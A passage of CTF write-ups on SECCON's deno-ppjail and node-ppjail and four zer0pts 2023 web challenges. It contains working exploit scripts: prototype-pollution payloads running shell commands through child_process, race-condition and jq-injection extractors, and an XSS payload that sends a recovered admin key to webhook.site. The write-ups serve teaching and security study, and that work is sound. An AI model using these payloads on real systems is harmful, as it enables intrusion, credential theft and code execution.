        try {
          set(target, key, new globalThis[type](...args));
        } catch {}
      }
    }
  }
};

const inputStr = prompt("Input your JSON:") ?? "";

const target: Dict = {
  title: "deno-ppjail",
  category: "sandbox",
};
merge(target, JSON.parse(inputStr));

The goal is RCE to read a flag file with an unknown name.

Solution

The merge function obviously has a prototype pollution vulnerability.

Interestingly, unlike common prototype pollution, you can also pollute something to an object in CUSTOM_TYPES that includes Function.

However, by if (key in target) return;, you cannot overwrite properties that are already defined (e.g.: toString, valueOf, and constructor):

const set = (target: unknown, key: string, value: unknown) => {
  if (!isDict(target)) return;
  if (key in target) return;
  target[key] = value;
};

That is, all you have to do is to find gadgets that lead to RCE under those conditions.

My intended solution uses the following gadget:

$ deno
...

> ({}).constructor.prototype.return = () => console.log(1337)
[Function (anonymous)]
> for (const x of [1, 2, 3]) {
  break;
}
1337
Uncaught TypeError: Iterator result undefined is not an object
    at <anonymous>:7:3
> const [x] = [1, 2, 3];
1337
Uncaught TypeError: Iterator result undefined is not an object
    at <anonymous>:2:8
>

This behavior is attributed to the specification of IteratorClose defined in ECMAScript:

  1. Let innerResult be Completion(GetMethod(iterator, "return")).
  2. If innerResult.[[Type]] is normal, then a. Let return be innerResult.[[Value]]. b. If return is undefined, return ? completion. c. Set innerResult to Completion(Call(return, iterator)).

The part where IteratorClose may be called:

for (const key of Object.keys(input)) {

So, a given function is called when the following conditions are satisfied:

  • Object.prototype.return is polluted to a Function object.
  • In the for-loop, the IteratorClose is called.
    • e.g. Uncaught runtime errors

The way to cause an error is simple:

$ deno
...

> ({}).toString.caller
Uncaught TypeError: 'caller', 'callee', and 'arguments' properties may not be accessed on strict mode functions or the arguments objects for calls to them
    at <anonymous>:2:15
>

Thus, the following JSON causes RCE!

{
  "constructor": {
    "prototype": {
      "return": {
        "__custom__": true,
        "type": "Function",
        "args": [
          "console.log(1337)"
        ]
      }
    }
  },
  "toString": {
    "caller": {}
  }
}

Execution result:

$ deno
...

> merge({}, {
  "constructor": {
    "prototype": {
      "return": {
        "__custom__": true,
        "type": "Function",
        "args": [
          "console.log(1337)"
        ]
      }
    }
  },
  "toString": {
    "caller": {}
  }
})
1337
1337
Uncaught TypeError: 'caller', 'callee', and 'arguments' properties may not be accessed on strict mode functions or the arguments objects for calls to them
    at merge (<anonymous>:33:19)
    at merge (<anonymous>:33:7)
    at <anonymous>:2:1
>

Solver

import os
import pwn
import json

io = pwn.remote(os.getenv("SECCON_HOST"), os.getenv("SECCON_PORT"))

payload = """
for (const entry of Deno.readDirSync("/")) {
    if (entry.name.startsWith("flag-")) {
        const flag = new TextDecoder().decode(Deno.readFileSync("/" + entry.name));
        console.log(flag);
    }
}
""".strip()

input_str = json.dumps({
    "constructor": {
        "prototype": {
            # ref. https://tc39.es/ecma262/2023/multipage/abstract-operations.html#sec-iteratorclose
            #
            # > 3. Let innerResult be Completion(GetMethod(iterator, "return")).
            # > 4. If innerResult.[[Type]] is normal, then
            # >     a. Let return be innerResult.[[Value]].
            # >     b. If return is undefined, return ? completion.
            # >     c. Set innerResult to Completion(Call(return, iterator)).
            "return": {
                "__custom__": True,
                "type": "Function",
                "args": [
                    payload,
                ],
            },
        },
    },
    # Cause an error
    "toString": {
        "caller": {},
    },
})

io.sendlineafter(b"Input your JSON: ", input_str.encode())
print(io.recvall().decode())

Flag

SECCON{ECMAScr1pt_has_g4dgets_of_prototype_po11ution!!!}

[sandbox] node-ppjail

Description:

Do you like Node better than Deno?

nc node-ppjail.seccon.games 1337

🐢 node-ppjail.tar.gz

Overview

This challenge is almost the same as deno-ppjail.

Challenge file:

import * as fs from "node:fs";

const CUSTOM_KEY = "__custom__";
const CUSTOM_TYPES = [
  "Object",
  "String",
  "Boolean",
  "Array",
  "Function",
  "RegExp",
];

type Dict = Record<string, unknown>;
type Custom = {
  [CUSTOM_KEY]: true;
  type: string;
  args: unknown[];
};

const isDict = (value: unknown): value is Dict => {
  return value === Object(value);
};

const isCustom = (value: unknown): value is Custom => {
  return isDict(value) && !!value[CUSTOM_KEY];
};

const set = (target: unknown, key: string, value: unknown) => {
  if (!isDict(target)) return;
  if (key in target) return;
  target[key] = value;
};

const merge = (target: unknown, input: Dict) => {
  if (!isDict(target)) return;
  for (const key of Object.keys(input)) {
    const value = input[key];
    if (!isDict(value)) {
      set(target, key, value);
    } else if (Array.isArray(value)) {
      set(target, key, []);
      merge(target[key], value);
    } else if (!isCustom(value)) {
      set(target, key, {});
      merge(target[key], value);
    } else {
      const { type, args } = value;
      if (CUSTOM_TYPES.includes(type)) {
        try {
          set(target, key, new globalThis[type](...args));
        } catch {}
      }
    }
  }
};

process.stdout.write("Input your JSON: ");
const inputStr = (() => {
  const buf = new Uint8Array(1024);
  const n = fs.readSync(fs.openSync("/dev/stdin", "r"), buf);
  return new TextDecoder().decode(buf.slice(0, n));
})();

const target: Dict = {
  title: "node-ppjail",
  category: "sandbox",
};
merge(target, JSON.parse(inputStr));
package.json
{
  "name": "node-ppjail",
  "version": "1.0.0",
  "main": "index.js",
  "private": true,
  "scripts": {
    "build": "tsc index.ts"
  },
  "devDependencies": {
    "@types/node": "^20.6.0",
    "typescript": "^5.2.2"
  }
}

The goal is also to gain RCE to read a flag file with an unknown name.

The difference from deno-ppjail is that the source code is transpiled into JavaScript and executed by node command.

Solution

The transpiled JavaScript is as follows:

/* snip */
var merge = function (target, input) {
    var _a;
    if (!isDict(target))
        return;
    for (var _i = 0, _b = Object.keys(input); _i < _b.length; _i++) {
        var key = _b[_i];
        var value = input[key];
/* snip */

The for-loop does not use Iterator3, so it is impossible to call IteratorClose and you cannot use the gadget used in deno-ppjail.

It means that you need to find a gadget other than IteratorClose. But not to worry, Node.js has some gadgets. In fact, I found three gadgets in the internals of Node.js.

For example:

({}).__proto__[1] = { callback: () => console.log(1337) }

The callback will be called in the process for task queues.

See my solver below for details.

Solver

import os
import pwn
import json

io = pwn.remote(os.getenv("SECCON_HOST"), os.getenv("SECCON_PORT"))

command = "cat /flag-*.txt"


def solve1() -> str:
    # Solution 1:
    return json.dumps({
        "__proto__": {
            # ref. https://github.com/nodejs/node/blob/v20.6.0/lib/internal/fixed_queue.js#L81
            # ref. https://github.com/nodejs/node/blob/v20.6.0/lib/internal/process/task_queues.js#L77
            "1": {
                "callback": {
                    "__custom__": True,
                    "type": "Function",
                    "args": [
                        f"console.log(global.process.mainModule.require('child_process').execSync('{command}').toString())"
                    ],
                },
            },
        },
    })


def solve2() -> str:
    # Solution 2:
    return json.dumps({
        "__proto__": {
            # ref. https://github.com/nodejs/node/blob/v20.6.0/lib/internal/util/inspect.js#L1064
            "circular": {
                "get": {
                    "__custom__": True,
                    "type": "Function",
                    "args": [
                        f"console.log(global.process.mainModule.require('child_process').execSync('{command}').toString())"
                    ],
                },
            },
            # ref. https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Error/cause
            "cause": 1,
        },
        # Cause an error
        "toString": {
            "caller": {},
        },
    })


def solve3() -> str:
    # Solution 3:
    return json.dumps({
        "__proto__": {
            # ref. https://github.com/nodejs/node/blob/v20.6.0/lib/internal/errors.js#L140
            "prepareStackTrace": {
                "__custom__": True,
                "type": "Function",
                "args": [
                    f"console.log(global.process.mainModule.require('child_process').execSync('{command}').toString())"
                ],

            },
        },
        # Cause an error
        "toString": {
            "caller": {},
        },
    })


input_str = solve1()
# input_str = solve2()
# input_str = solve3()

io.sendlineafter(b"Input your JSON: ", input_str.encode())
print(io.recvall().decode())

Flag

SECCON{Deno_i5_an_anagr4m_0f_Node}

JavaScript is an insane and interesting language!

Footnotes

  1. https://arxiv.org/pdf/2106.05123.pdf

  2. Strictly speaking, there are more conditions for the shuffle.

  3. That's because the default value for target option of tsc is ES3. ES3 is a very old ECMAScript version. ref: https://www.typescriptlang.org/tsconfig/#target

]]> CTF <![CDATA[zer0pts CTF 2023 writeup (4 web challs)]]> https://blog.arkark.dev/2023/07/17/zer0pts-ctf https://blog.arkark.dev/2023/07/17/zer0pts-ctf Mon, 17 Jul 2023 00:00:00 GMT zer0pts CTF 2023 に./Vespiaryで参加して8位でした!

guess要素が一切なく、各問題もよく構成されたものが多く、例年通りとてもたのしいCTFでした。

web問のWarmuprofile、jqi、Neko Note、Plain Blogを解いたので以下はそのwriteupです。2問web問が残ってしまいましたが、時間的に厳しかったです(これは言い訳で、時間があったとしても実際に解けていたかは不明)。しっかり問題の誘導に乗れることができたらもっと早く解けたと思うので、鍛えていきたいです。また、最近は一緒にweb問を解いてくれるwebメインの人が自分以外にもほしいなと思っているところです1

関連リンク

[web] Warmuprofile2

137 pts, 48 solves

問題文:

I made an app to share your profile.
http://others.2023.zer0pts.com:8600/
http://misc.2023.zer0pts.com:8600/ (backup)
http://misc2.2023.zer0pts.com:8600/ (US)
http://misc3.2023.zer0pts.com:8600/ (EU)
Note: Click "Spawn container" to make a challenge container only for you. When writing exploits, be careful that the container asks for BASIC auth credentials.

問題概要

アカウントの登録/ログイン/ログアウト/削除が可能で、自分のプロフィールページをつくれるWebサービスが与えられます。

ゴールはadminでログインした状態でGET /flagにアクセスすることです。

app.get('/flag', needAuth, (req, res) => {
    if (req.session.username !== 'admin') {
        flash(req, 'only admin can read the flag');
        return res.redirect('/');
    }

    return res.render('flag', { chall_name: CHALL_NAME, flash: getFlash(req), flag: FLAG });
});

ただし、adminのパスワードは不明なため正常系ではログインできません。

また、この問題では参加者ごとにインスタンス単位で環境が隔離されているため、なんらかのアプリケーション全体に影響するような攻撃が可能だというメタ読みができます。

解法

ソースコードを眺めていると、アカウント削除の処理でどうやら変なフレームワークの使い方をしています。

app.post('/user/:username/delete', needAuth, async (req, res) => {
    const { username } = req.params;
    const { username: loggedInUsername } = req.session;
    if (loggedInUsername !== 'admin' && loggedInUsername !== username) {
        flash(req, 'general user can only delete itself');
        return res.redirect('/');
    }

    // find user to be deleted
    const user = await User.findOne({
        where: { username }
    });

    await User.destroy({
        where: { ...user?.dataValues }
    });

    // user is deleted, so session should be logged out
    req.session.destroy();
    return res.redirect('/');
});

userがnullないしはundefinedのときに、テーブル内のデータ全削除が発生しそうです。実際にrace conditionでそれは可能です。

全削除をするとadminも消えるので、adminのアカウントを作り直してログインすることでフラグが手に入ります。

攻撃

import httpx
import random
import string
import subprocess

# BASE_URL = "http://localhost:8600"
# CS_USERNAME = "name"
# CS_PASSWORD = "pass"

BASE_URL = "http://misc.2023.zer0pts.com:62954"
CS_USERNAME = "sdOKZXnqAzMNEBLF"
CS_PASSWORD = "lRAqcPxmvrUFZfEH"

client = httpx.Client(auth=(CS_USERNAME, CS_PASSWORD))

username = "".join(random.choices(string.ascii_letters, k=8))
password = "".join(random.choices(string.ascii_letters, k=8))

res = client.post(
    f"{BASE_URL}/register",
    data={
        "username": username,
        "password": password,
        "profile": "x",
    },
)
sid = res.cookies["connect.sid"]

curl_cmd = f"curl -X POST '{BASE_URL}/user/{username}/delete' -b 'connect.sid={sid}' -u '{CS_USERNAME}:{CS_PASSWORD}'"
subprocess.run(
    f"{curl_cmd} & {curl_cmd} & {curl_cmd} & {curl_cmd} & {curl_cmd} & {curl_cmd}",
    shell=True,
    capture_output=True,
)

res = client.post(
    f"{BASE_URL}/register",
    data={
        "username": "admin",
        "password": "admin",
        "profile": "x",
    },
)
assert res.status_code == 302, res

print(client.get(f"{BASE_URL}/flag").text)
$ python exploit.py
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Flag - Warmuprofile</title>
    <link rel="stylesheet" href="https://unpkg.com/sakura.css/css/sakura.css" type="text/css">
    <link rel="stylesheet" href="/style.css" type="text/css">
</head>
<body>
    <h1>Flag</h1>

    <p>Congratulations! The flag is: <code>zer0pts{fire_ice_storm_di_acute_brain_damned_jugem_bayoen_bayoen_bayoen_10cefab0}</code></p>
</body>
</html>

フラグ

zer0pts{fire_ice_storm_di_acute_brain_damned_jugem_bayoen_bayoen_bayoen_10cefab0}

ダミーフラグのnek0pts{...}が好きです。

感想

誘導がわかりやすくて、warmupらしい素直なrace conditionという感じでした3

ところで上記攻撃スクリプトでは、マルチスレッドをまじめにやるのが面倒だったので、subprocess.runでシェルのバックグラウンドプロセスを利用しています。お手軽race conditionテクニックでおすすめです。

[web] jqi

149 pts, 40 solves

問題文:

I think jq is useful, so I decided to make a Web app that uses jq.
http://jqi.2023.zer0pts.com:8300/

問題概要

GET /api/searchでjqのクエリを動的に組み立てており、ここをうまく攻撃することで環境変数のフラグを奪取する問題です。

const KEYS = ['name', 'tags', 'author', 'flag'];
fastify.get('/api/search', async (request, reply) => {
    const keys = 'keys' in request.query ? request.query.keys.toString().split(',') : KEYS;
    const conds = 'conds' in request.query ? request.query.conds.toString().split(',') : [];

    if (keys.length > 10 || conds.length > 10) {
        return reply.send({ error: 'invalid key or cond' });
    }

    // build query for selecting keys
    for (const key of keys) {
        if (!KEYS.includes(key)) {
            return reply.send({ error: 'invalid key' });
        }
    }
    const keysQuery = keys.map(key => {
        return `${key}:.${key}`
    }).join(',');

    // build query for filtering results
    let condsQuery = '';

    for (const cond of conds) {
        const [str, key] = cond.split(' in ');
        console.log([str, key])
        if (!KEYS.includes(key)) {
            return reply.send({ error: 'invalid key' });
        }

        // check if the query is trying to break string literal
        if (str.includes('"') || str.includes('\\(')) {
            return reply.send({ error: 'hacking attempt detected' });
        }

        condsQuery += `| select(.${key} | contains("${str}"))`;
    }

    let query = `[.challenges[] ${condsQuery} | {${keysQuery}}]`;
    console.log('[+] keys:', keys);
    console.log('[+] conds:', conds);

    let result;
    try {
        result = await jq.run(query, './data.json', { output: 'json' });
    } catch(e) {
        console.error(e);
        return reply.send({ error: 'something wrong' });
    }

    if (conds.length > 0) {
        reply.send({ error: 'sorry, you cannot use filters in demo version' });
    } else {
        reply.send(result);
    }
});

解法

        // check if the query is trying to break string literal
        if (str.includes('"') || str.includes('\\(')) {
            return reply.send({ error: 'hacking attempt detected' });
        }

によって、文字列からの脱出によるインジェクションを対策していますが、\を末尾に置くことで\"になり脱出が可能です。

一般的なblind SQLi攻撃の考え方と同様に攻撃を組むことで攻撃できそうです。jqの仕様には詳しくないため、ドキュメント等を漁りながらオラクルを構成しました。都合が良いことに、jq実行時にエラーが発生するかどうかでレスポンス内容が変化するためerror-basedなオラクルができます4

使ったjqの仕様は以下のとおりです。

  • #でコメントアウト
  • implodeによる任意文字列の生成
    • validationで"の文字種が利用できなかったため
  • オラクル: if (env.FLAG | startswith(...)) then error(...) else 0 end
    • env.FLAG | startswith(...)によるフラグのprefix判定
    • errorによるランタイムエラーの発生

なお、data.jsonには[0-9a-z{}]の文字種がそろっており、ascii_upcaseと組み合わせることで任意文字列の生成が可能でした。でもこの方法は面倒でやりたくないなあと思っていたところ、implodeを発見して楽ができました。

攻撃

import httpx
import string

# BASE_URL = "http://localhost:8300"
BASE_URL = "http://jqi.2023.zer0pts.com:8300"

CHARS = "}_" + string.ascii_letters + string.digits


def make_str(xs: str) -> str:
    return "(" + "+".join([f"([{ord(x)}] | implode)" for x in xs]) + ")"


def is_ok(prefix: str) -> bool:
    res = httpx.get(
        f"{BASE_URL}/api/search",
        params={
            "keys": "name",
            "conds": ",".join([
                "\\ in name",
                f"))] + [if (env.FLAG | startswith({make_str(prefix)})) then error({make_str('x')}) else 0 end] # in name"
            ]),
        },
    )
    return res.json()["error"] == "something wrong"


known = "zer0pts{"
while not known.endswith("}"):
    for c in CHARS:
        if is_ok(known + c):
            known += c
            break
    print(known)
print("Flag: " + known)
$ python exploit.py
zer0pts{1
zer0pts{1d
zer0pts{1dk
zer0pts{1dk_
... snip ...
zer0pts{1dk_why_1t_uses_jq
zer0pts{1dk_why_1t_uses_jq}
Flag: zer0pts{1dk_why_1t_uses_jq}

フラグ

zer0pts{1dk_why_1t_uses_jq}

感想

jqのコメント機能がドキュメントになぜか書かれておらず、また、/* *///でコメントアウトができなかったので、できないんだと思い込んでしまい、時間をかなり溶かしました。悲しい。

問題自体は、SQLiの知見の転用ということで教育的で好きです。

[web] Neko Note

181 pts, 26 solves

問題文:

I made another note app.
http://neko-note.2023.zer0pts.com:8005/

問題概要

タイトルのねこのしっぽアニメーションがかわいいノートアプリケーションが与えられます。

ゴールはadmin botが投稿するノートに書かれたフラグを奪取することです。

解法

ノートのレンダリング処理は以下のとおりです。

var linkPattern = regexp.MustCompile(`\[([0-9a-f]{8}-[0-9a-f]{4}-4[0-9a-f]{3}-[0-9a-f]{4}-[0-9a-f]{12})\]`)

// replace [(note ID)] to links
func replaceLinks(note string) string {
	return linkPattern.ReplaceAllStringFunc(note, func(s string) string {
		id := strings.Trim(s, "[]")

		note, ok := notes[id]
		if !ok {
			return s
		}

		title := html.EscapeString(note.Title)
		return fmt.Sprintf(
			"<a href=/note/%s title=%s>%s</a>", id, title, title,
		)
	})
}

// escape note to prevent XSS first, then replace newlines to <br> and render links
func renderNote(note string) string {
	note = html.EscapeString(note)
	note = strings.ReplaceAll(note, "\n", "<br>")
	note = replaceLinks(note)
	return note
}

基本的にはhtml.EscapeStringでXSSを対策がされてますが、<a>タグの属性値が"で囲まれていないため任意の属性値を指定可能です。

実際に

x autofocus onfocus=console.log(location)

のようなタイトルを設定すると、

<a href=/note/xxx-xxx-xxx title=x autofocus onfocus=console.log(location)>x autofocus onfocus=console.log(location)</a>

<a>タグが生成されてXSSが可能です。

次にadmin botの挙動を確認します。

    try {
        const context = await browser.newContext();
        const page = await context.newPage();

        // post a note that has the flag
        await page.goto(`${BASE_URL}/`);

        await page.type('#title', 'Flag');
        await page.type('#body', `The flag is: ${FLAG}`);
        const password = crypto.randomBytes(64).toString('base64');
        await page.type('#password', password);

        await page.click('#submit');

        // let's check the reported note
        await page.goto(`${BASE_URL}/note/${id}`);
        if (await page.$('input') != null) {
            // the note is locked, so use master key to unlock
            await page.type('input', MASTER_KEY);
            await page.click('button');

            // just in case there is a vuln like XSS, delete the password to prevent it from being stolen
            const len = (await page.$eval('input', el => el.value)).length;
            await page.focus('input');
            for (let i = 0; i < len; i++) {
                await page.keyboard.press('Backspace');
            }
        }

        // it's ready now. click "Show the note" button
        await page.click('button');

        // done!
        await wait(1000);

        await context.close();
    } catch (e) {
        console.error(e);
    }

MASTER_KEYを入力後に、XSSでその値を盗まれないように削除しています。この消した値を復元することはできないでしょうか?

調べてみると、どうやらdocument.execCommand("undo")で削除した操作を戻すことが可能みたいです。

というわけで上記のXSSと組み合わせてMASTER_KEYを盗めます。また、

JSON.parse(localStorage.getItem("neko-note-history"))[0].id

からフラグが含まれるノートのidも盗むことで、フラグ奪取が可能になります。

攻撃

import httpx

# BASE_URL = "http://localhost:8005"
BASE_URL = "http://neko-note.2023.zer0pts.com:8005"

HOOK_URL = "https://webhook.site/xxx"

client = httpx.Client()


def create_note(title: str, body: str) -> str:
    res = client.put(
        f"{BASE_URL}/api/note/new",
        data={
            "title": title,
            "body": body,
            "password": "x",
        },
    )
    assert res.json()["status"] == "ok"
    return res.json()["id"]


title1 = f"x autofocus onfocus=if(!window.w){{document.execCommand(`undo`);setTimeout(function(){{navigator.sendBeacon(`{HOOK_URL}`,document.querySelector(`input`).value+`/`+JSON.parse(localStorage.getItem(`neko-note-history`))[0].id)}},300)}}"
body1 = "x"
uuid1 = create_note(title1, body1)

title2 = "x"
body2 = f"[{uuid1}]"
uuid2 = create_note(title2, body2)


print(uuid2)
print(f"{BASE_URL}/note/{uuid2}")

# -> ae4eadec-3bc0-4884-8ffb-f997a41d35b3/9bc1a14f-bfea-4715-9540-96179f34567e
# MASTER_KEY = "ae4eadec-3bc0-4884-8ffb-f997a41d35b3"
# ADMIN_UUID = "9bc1a14f-bfea-4715-9540-96179f34567e"

フラグ

zer0pts{neko_no_te_mo_karitai_m8jYx9WiTDY}

感想

document.execCommand("undo")は知らなかったので知見でした。ブラウザAPI、知らないものが多すぎる問題。

補遺

他のアプローチとしてHistory APIを使った方法を検討しましたがうまくいかなかったです。

というのも、botがノートを書き込んでいるタブと、与えられたurlをアクセスするタブが共有しているので、history.back()を実行すると、ブラウザのキャッシュによって書き込んだノートの内容が入力された状態でページが表示されます。これを利用してMASTER_KEYなしでフラグを奪取することを試みました。

つまり以下のようなことをします:

  1. XSSで、XSSが可能なページをwindow.openする
  2. open先で、opener.history.back()を実行
  3. open先で、opener.document.getElementById("body").valueからフラグを取得

これでうまく行けるかなと思ったのですが、step 3で

Uncaught DOMException: Blocked a frame with origin "http://localhost:8005" from accessing a cross-origin frame.

と怒られました。same-originなんだけど、どうして...。history.back()をしなかったら普通にアクセスできました。

ちょっと前までは非想定テクニック()として重宝してたんですが、chromeの仕様が変わったのか謎です。そんな調査できてないですが、なにか知っている方がいたら教えてください。

[web] Plain Blog

239 pts, 14 solves

問題文:

I made a blog service consists of two servers: API server and Frontend server. The former provides APIs that you can see, add, or modify posts. The latter uses responses from API server and render it.
If you could get 1,000,000,000,000 likes on your post, I will give you the flag. The maximum number of likes is 5,000, though.
API server: http://plain-blog.2023.zer0pts.com:8400/
Frontend server: http://plain-blog.2023.zer0pts.com:8401/

問題概要

シンプルなブログ投稿サービスが与えられます。

いいね機能が実装されており、問題に絡んできそうです。また、フロントエンドサーバとAPIサーバでコンテナごと分かれているのも特徴的です。

ゴールは、permission['flag']をtrueにして

GET /api/post/:id/has_enough_permission_to_get_the_flag'

にアクセスすることです:

# the post has over 1,000,000,000,000 likes, so we give you the flag
get '/api/post/:id/has_enough_permission_to_get_the_flag' do
    id = params['id']
    if !posts.key?(id)
        return { 'error' => 'no such post' }.to_json
    end

    permission = posts[id]['permission']
    if !permission || !permission['flag']
        return { 'flag' => 'nope' }.to_json
    end

    return { 'flag' => FLAG }.to_json
end

いいねを1_000_000_000_000個集めるとそれは可能ですが、それは可能でしょうか?という問題です。

post '/api/post/:id/like' do
    # ... snip ...

    # get 1,000,000,000,000 likes to capture the flag!
    if posts[id]['like'] >= 1_000_000_000_000
        posts[id]['permission']['flag'] = true
    end

    return { 'post' => posts[id] }.to_json
end

解法

Step 1: Prototype Pollution

まず、index.phprenderPageが変わった処理を行っていることに気づきます。

        async function renderPage() {
            const params = new URLSearchParams(location.hash.slice(1));
            const page = params.get('page') || 'index';
            isAdmin = !!params.get('admin');

            /* ... snip ... */

            if (page === 'post' && params.has('id')) {
                const ids = params.get('id').split(',');

                const types = {
                    title: 'string', content: 'string', like: 'number'
                };
                let posts = {}, data, post;
                for (const id of ids) {
                    try {
                        const res = await (await request('GET', `/api/post/${id}`)).json();
                        // ToDo: implement error handling
                        if (res.post) {
                            data = res.post;
                        }

                        // to allow duplicate id but show only once
                        if (!(id in posts)) {
                            posts[id] = {};
                        }
                        post = posts[id];

                        // type check
                        for ([key, value] of Object.entries(data)) {
                            // we don't care the types of properties other than title, content, and like
                            // because we don't use them
                            if (key in types && typeof value !== types[key]) {
                                continue;
                            }

                            post[key] = value;
                        }
                    } catch {}
                }

                content.innerHTML = '';
                for (const [id, post] of Object.entries(posts)) {
                    content.appendChild(await renderPost(id, post, isAdmin ? 1000 : 1));
                }
            }
        }

id"__proto__"のときにprototype pollutionができそうで、実際にそれは可能です。 ただし、正常系の操作では"title""content""like"のいずれかの汚染しかできないので、自由度が低いです。

ところがAPI側の実装をよく読んでみると、PUT /api/post/:idpermission以外の任意のプロパティを設定することがわかります。

put '/api/post/:id' do
    token = request.env['HTTP_AUTHORIZATION']
    is_admin = token == ADMIN_KEY

    id = params['id']
    if !posts.key?(id)
        return { 'error' => 'no such post' }.to_json
    end

    id = params['id']
    if SAMPLE_IDS.include?(id)
        return { 'error' => 'sample post should not be updated' }.to_json
    end

    if !is_admin && params['permission']
        return { 'error' => 'only admin can change the parameter' }.to_json
    end

    if !(params['title'] || params['content'])
        return { 'error' => 'no title and content specified' }.to_json
    end

    posts[id].merge!(params)
    return posts[id].to_json
end

よって、prototype pollutionし放題です。

次に、汚染先で都合が良いものかないかの検討ですが、

        function request(method, path, body=null) {
            const options = {
                method,
                mode: 'cors'
            };

            if (body != null) {
                options.body = body;
            }

            const baseUrl = isAdmin ? '<?= API_BASE_URL_FOR_ADMIN ?>' : '<?= API_BASE_URL ?>';
            return fetch(`${baseUrl}${path}`, options);
        }

におけるfetchの処理でheadersの値が汚染されている場合、リクエスト時に任意のヘッダを付与することが可能です。

Step 2: adminのいいね数の改竄

(補足: この問題を解くにあたってこのステップは不要ですが、思考過程の一部として書いています)

admin botの挙動を確認すると、ページアクセス後にいいねボタンを1度クリックしています。

    try {
        const context = await browser.newContext();
        const page = await context.newPage();
        await page.setExtraHTTPHeaders({
            'Authorization': ADMIN_KEY
        });

        // let's check the reported post
        const url = `${BASE_URL}/#page=post&id=${id}&admin=yes`;
        await page.goto(url);
        await page.waitForSelector('.like', { timeout: 5000 });

        // click the first like button
        await page.click('.like');

        // done!
        await wait(1000);

        await context.close();
    } catch (e) {
        console.error(e);
    }

実際のいいね処理は以下の通りで、idの箇所でpath traversalが可能です。ただし、likesはadminの場合1000で固定です。

        async function addLike(id, likes) {
            const formData = new FormData();
            formData.append('likes', likes);
            return await (await request('POST', `/api/post/${id}/like`, formData)).json();
        }

API側のいいね処理は次のようになっています:

post '/api/post/:id/like' do
    id = params['id']
    if !posts.key?(id)
        return { 'error' => 'no such post' }.to_json
    end

    permission = posts[id]['permission']
    if !permission || !permission['like']
        return { 'error' => 'like is restricted' }.to_json
    end

    token = request.env['HTTP_AUTHORIZATION']
    is_admin = token == ADMIN_KEY

    likes = (params['likes'] || 1).to_i
    if !is_admin && likes != 1
        return { 'error' => 'you can add only one like at one time' }.to_json
    end

    if (posts[id]['like'] + likes) > MAX_LIKES
        return { 'error' => 'too much likes' }.to_json
    end
    posts[id]['like'] += likes

    # get 1,000,000,000,000 likes to capture the flag!
    if posts[id]['like'] >= 1_000_000_000_000
        posts[id]['permission']['flag'] = true
    end

    return { 'post' => posts[id] }.to_json
end

Sinatraのparamsはクエリパラメータも見てくれるので?likes=hogeparams['likes']を任意の値にできそうです。しかし、実際にはボディパラメータのlikes=1000が優先されてしまいます。

ここで、prototype pollutionでContent-Type: text/plainのヘッダを付与することを考えます。この場合、ボディパラメータのlikes=1000はSinatra側で認識されないし、preflight requestも飛ばないためCORSポリシーにも違反しません。よって、クエリパラメータの?likes=hogeの値をparams['likes']にセットすることが可能です。

実際に、adminに-100000000000000000000000000000いいねしてもらいましょう:

import httpx
import urllib.parse

# FRONTEND_BASE_URL = "http://localhost:8401"
# API_BASE_URL = "http://localhost:8400"

FRONTEND_BASE_URL = "http://plain-blog.2023.zer0pts.com:8401"
API_BASE_URL = "http://plain-blog.2023.zer0pts.com:8400"


def create_note(title: str, content: str) -> str:
    res = httpx.post(
        f"{API_BASE_URL}/api/post",
        data={
            "title": title,
            "content": content,
        }
    )
    return res.json()["post"]["id"]


def update_note(id: str, data):
    res = httpx.put(
        f"{API_BASE_URL}/api/post/{id}",
        data=data,
    )
    return res.json()


uuid1 = create_note("x", "x")

uuid2 = create_note("x", "x")
update_note(uuid2, {"headers[Content-Type]": "text/plain", "title[x]": "", "content[x]": "", "like[x]": ""})

# botにいいねしてもらうpostのURL
print(f"{FRONTEND_BASE_URL}/#page=post&id={uuid1}")

# reportする文字列
print(f"{urllib.parse.quote(uuid1+'/like?likes=-100000000000000000000000000000#')},{uuid2},__proto__")

うまくできてます:

あとは

    if (posts[id]['like'] + likes) > MAX_LIKES
        return { 'error' => 'too much likes' }.to_json
    end
    posts[id]['like'] += likes

    # get 1,000,000,000,000 likes to capture the flag!
    if posts[id]['like'] >= 1_000_000_000_000
        posts[id]['permission']['flag'] = true
    end

を突破するだけ...いや不可能です。

MAX_LIKES5000なので、現実的な時間内に1_000_000_000_000以上にすることはできません。

  1. いいね数を-1_000_000_000_000に吹き飛ばす
  2. race conditionで1_000_000_000_000いいねを2回以上瞬間的に実行させる

ということも考えましたが、adminがいいねするのはreportあたり1度であり、また、上記処理を重たくしてrace conditionを成功させることも現実的ではありません。Rubyなのでオーバーフローもしません。困った...

Step 3: X-HTTP-Method-Override

途方に暮れてソースコードを眺めていると、preflight requestの処理でX-から始まるリクエストヘッダを特別扱いしていることに気づきました。他の箇所でこれが利用されていないため、あやしいです。

        requested_headers = (request.env['HTTP_ACCESS_CONTROL_REQUEST_HEADERS'] || '').gsub(/\s/, '').split(',')
        # enumerate requested headers for Access-Control-Allow-Headers
        requested_headers.filter! do |h|
            h.downcase() == 'authorization' || \
            h.downcase().start_with?('x-') # if it starts with X-, then it's safe, I think
        end
end

WebフレームワークにはX-...形式のリクエストヘッダに対する特殊な挙動を行うものがしばしば存在します。

  • 例: GinのX-Forwarded-Prefix

Sinatra(依存しているRack含む)にも似たようなものがないか探してみました。

HTTP_METHOD_OVERRIDE_HEADER = "HTTP_X_HTTP_METHOD_OVERRIDE"

なんかありました。どうやらこれは、実際のメソッドを別のメソッドに上書きするリクエストヘッダのようです。実際に試すと、この問題に対して有効なことがわかりました。

よって、

X-HTTP-Method-Override: PUT

のリクエストヘッダでadminをPUT /api/post/:idにアクセスさせることが可能です。

?title=x&content=x&permission[flag]=1

のクエリパラメータを付与させることでpermission[flag]も変更可能です。あとはフラグ一直線。

攻撃

import httpx
import urllib.parse

# FRONTEND_BASE_URL = "http://localhost:8401"
# API_BASE_URL = "http://localhost:8400"

FRONTEND_BASE_URL = "http://plain-blog.2023.zer0pts.com:8401"
API_BASE_URL = "http://plain-blog.2023.zer0pts.com:8400"


def create_note(title: str, content: str) -> str:
    res = httpx.post(
        f"{API_BASE_URL}/api/post",
        data={
            "title": title,
            "content": content,
        }
    )
    return res.json()["post"]["id"]


def update_note(id: str, data):
    res = httpx.put(
        f"{API_BASE_URL}/api/post/{id}",
        data=data,
    )
